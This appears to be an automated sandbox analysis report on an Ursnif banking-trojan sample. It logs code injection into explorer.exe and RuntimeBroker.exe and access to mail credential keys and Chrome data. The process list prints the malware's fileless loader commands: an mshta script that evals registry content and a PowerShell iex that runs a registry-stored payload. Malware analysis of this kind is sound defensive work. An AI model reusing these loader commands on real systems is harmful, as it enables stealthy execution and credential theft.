Source: C:\Windows\System32\control.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0	Jump to behavior
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Memory written: C:\Windows\System32\control.exe base: 7FF68E5512E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 940000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 2AE0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 93C000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: D70000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 1B888A50000	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: C:\Windows\System32\rundll32.exe base: 7FF7D6015FD0	Jump to behavior
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A2057A000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 5557E30000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 163C5210000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: CB290AE000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1EAE4200000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: D2F18CF000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27740170000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 35D0000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: D96FC0

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute read	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory protected: C:\Windows\explorer.exe base: 7FFC8DCB1580 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 940000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2AE0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 93C000 value: 00	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: D70000 value: 80	Jump to behavior
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Thread register set: target process: 2904	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\System32\control.exe	Thread register set: target process: 6080	Jump to behavior
Source: C:\Windows\explorer.exe	Thread register set: target process: 4084
Source: C:\Windows\explorer.exe	Thread register set: target process: 4176
Source: C:\Windows\explorer.exe	Thread register set: target process: 4440
Source: C:\Windows\explorer.exe	Thread register set: target process: 4544
Source: C:\Windows\explorer.exe	Thread register set: target process: 6088

Source: unknown

Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.485521161.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_03C47A2E cpuid

0_2_03C47A2E

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_00401E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_00401E22

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_03C47A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_03C47A2E

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_00401752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_00401752

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000006
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
